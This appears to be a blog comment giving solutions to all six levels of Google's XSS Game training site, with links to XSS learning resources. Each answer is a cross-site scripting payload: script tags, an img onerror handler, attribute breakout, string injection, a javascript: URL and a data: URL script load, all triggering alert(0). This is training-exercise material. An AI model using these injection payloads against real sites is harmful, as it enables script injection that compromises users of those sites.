SITE: xss-game.appspot.com
DO NOT CHEAT YOURSELF OUT OF LEARNING - The answers will need to be highlighted to view, I don't want to spoil the fun for everyone.
Resources to learn about XSS:
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
http://excess-xss.com/
http://www.breakthesecurity.com/2011/10/cross-site-scriptingxss-complete.html
http://www.securitytube-training.com/online-courses/javascript-for-pentesters/index.html
http://www.pentesteracademy.com/course?id=11
Below you will find my answers to the six challenges on their site.
Challenge 1:
In the search form enter:
<script>alert(0);</script>
Challenge 2:
In your comment enter:
<img src=wizbang onerror='alert(0)' />
Challenge 3:
in the url bar enter:
' /><script>alert(0);</script>
Challenge 4:
In the timer form enter:
2');alert('0
Challenge 5:
This one is pretty neat, on the second page (signup) you need to get the next parameter to run your javascript. To do this just enter:
signup?next=javascript:alert(0);
Challenge 6:
This one is really cool because you need to load the javascript from a resource on a webpage or some other way. To complete the final challange I entered:
/level6/frame#data:text/javascript,alert(0);
Hopefully ill do a formal writeup and really explain why all of the answers work and maybe show some alternative ways to complete the challenges.
ReplyDelete